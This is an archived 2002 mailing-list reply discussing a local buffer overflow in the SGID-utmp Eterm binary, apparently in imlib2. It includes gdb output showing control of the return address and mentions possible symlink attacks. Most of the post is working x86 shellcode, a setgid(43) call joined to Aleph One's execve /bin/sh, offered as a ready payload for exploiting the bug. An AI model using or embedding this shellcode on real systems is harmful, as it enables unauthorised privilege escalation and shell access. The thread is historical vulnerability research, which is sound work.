Vulnerability Development mailing list archives
Re: Eterm SGID utmp Buffer Overflow (Local)
From: Charles 'core' Stevenson <core () bokeoa com>
Date: Tue, 15 Jan 2002 02:32:30 -0700
Simon 'corecode' Schubert wrote:
> > I found this last night looking for suids to overflow. Tested on
> > Debian PowerPC Unstable. Yields gid utmp from which higher privileges
> > could be gained with a little effort. I haven't looked too close but I
> > think the overflow might be in imlib2.
>
> could this be sploited under x86 as well? I don't see a way but this
> doesn't say anything... what do others say?

I'm not getting anywhere with it on x86 as far as the overflow goes.
There may be other problems... it looks in $HOME/.loaders/image so it's
possible there could be symlink attacks etc..

Program received signal SIGSEGV, Segmentation fault.
0x400b63ca in __imlib_ListLoaders () from /usr/lib/libImlib2.so.1
(gdb) bt
#0  0x400b63ca in __imlib_ListLoaders () from /usr/lib/libImlib2.so.1
#1  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

Here's a modified version of Aleph One's execve /bin/sh that does setgid
utmp. Might be useful to someone.

char shellcode[] =
    /* setgid(43) utmp on Debian */
    "\x6a\x2b"      /* 80483e0: 6a 2b    push   $0x2b */
    "\x5b"          /* 80483e2: 5b       pop    %ebx  */
    "\x6a\x2e"      /* 80483e3: 6a 2e    push   $0x2e */
    "\x58"          /* 80483e5: 58       pop    %eax  */
    "\xcd\x80"      /* 80483e6: cd 80    int    $0x80 */
    /* execve /bin/sh by Aleph One */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

Best Regards,
Charles Stevenson

> cheerz
>  corecode
> --
>  /"\   http://corecode.ath.cx/
>  \ /
>   \    ASCII Ribbon Campaign
>  / \   Against HTML Mail and News
Current thread:
- Eterm SGID utmp Buffer Overflow (Local) Charles 'core' Stevenson (Jan 13)
- Re: Eterm SGID utmp Buffer Overflow (Local) Simon 'corecode' Schubert (Jan 14)
- Re: Eterm SGID utmp Buffer Overflow (Local) Charles 'core' Stevenson (Jan 15)
- Re: Eterm SGID utmp Buffer Overflow (Local) Michael Jennings (Jan 21)
- Re: Eterm SGID utmp Buffer Overflow (Local) Simon 'corecode' Schubert (Jan 14)